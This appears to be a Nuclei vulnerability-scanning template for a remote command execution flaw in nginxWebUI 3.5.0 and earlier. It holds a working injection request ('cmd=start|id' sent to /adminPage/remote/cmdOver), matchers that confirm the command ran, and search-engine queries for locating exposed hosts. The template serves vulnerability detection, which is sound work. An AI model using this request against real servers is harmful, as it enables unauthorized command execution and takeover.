41 lines
1.2 KiB
YAML
41 lines
1.2 KiB
YAML
id: nginx-webui-rce
|
|
|
|
info:
|
|
name: nginxWebUI ≤ 3.5.0 - Remote Command Execution
|
|
author: ritikchaddha
|
|
severity: critical
|
|
description: |
|
|
There is a command execution vulnerability in the nginxWebUI backend. After logging in to the backend, the attacker can execute any command to obtain server permissions.
|
|
reference: |
|
|
- https://forum.butian.net/article/243
|
|
metadata:
|
|
max-request: 1
|
|
shodan-query: title="nginxwebui"
|
|
fofa-query: title="nginxwebui"
|
|
tags: nginx,nginxwebui,webui,rce
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /adminPage/remote/cmdOver HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
remoteId=local&cmd=start|id&interval=1
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/json"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a004630440220783be460f56c1a63d64579be48fb0d446b6a93054e0afcc8cc9afd79c2fad56d022011d35d81b18b3b8f58265661778006b07961e04ede40fd79f54f52e6c92c1271:922c64590222798bb761d5b6d8e72950 |